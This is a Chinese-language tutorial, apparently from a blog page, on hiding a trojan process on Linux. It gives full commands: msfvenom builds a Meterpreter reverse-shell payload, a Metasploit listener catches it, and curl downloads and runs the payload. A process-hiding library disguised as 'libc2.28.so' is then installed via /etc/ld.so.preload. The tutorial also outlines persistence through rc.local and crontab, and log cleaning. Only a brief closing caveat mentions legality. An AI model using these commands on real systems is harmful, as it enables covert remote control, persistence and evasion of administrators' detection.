赞
踩
环境准备:
生成Payload:
msfvenom
命令生成一个payload:msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod-ghost
启动Web服务:
systemctl start apache2
配置Metasploit侦听器:
msfdb run
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.53
set lport 4444
run
下载并运行Payload:
curl http://192.168.1.53/xuegod-ghost -o xuegod-ghost
chmod +x xuegod-ghost
./xuegod-ghost &
隐藏进程:
processhider.c
),该文件将被加载到所有进程中,并隐藏特定的进程名。上传和编译恶意库:
processhider.c
上传到CentOS系统,并编译成共享库(如libc2.28.so
):gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
配置/etc/ld.so.preload
:
/etc/ld.so.preload
文件中,以便系统在执行程序时自动加载:echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
重新创建侦听:
运行隐藏的Payload:
xuegod-ghost
,此时该进程不会出现在ps
命令的输出中。恢复进程可见性:
/etc/ld.so.preload
文件以恢复进程的可见性:rm -rf /usr/local/lib/libc2.28.so
echo > /etc/ld.so.preload
脚本自动化:
x.sh
),该脚本自动化下载、编译、执行payload,以及配置隐藏进程。配置开机启动和计划任务:
/etc/rc.d/rc.local
以实现开机自启动,或在/etc/crontab
中设置计划任务。系统日志清理:
通过上述步骤,你可以在Linux系统中隐藏木马程序进程,使其在常规的进程查看工具中不可见。这种技术在渗透测试中非常有用,但也可能被用于恶意目的,因此使用时需要严格遵守法律和道德规范。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。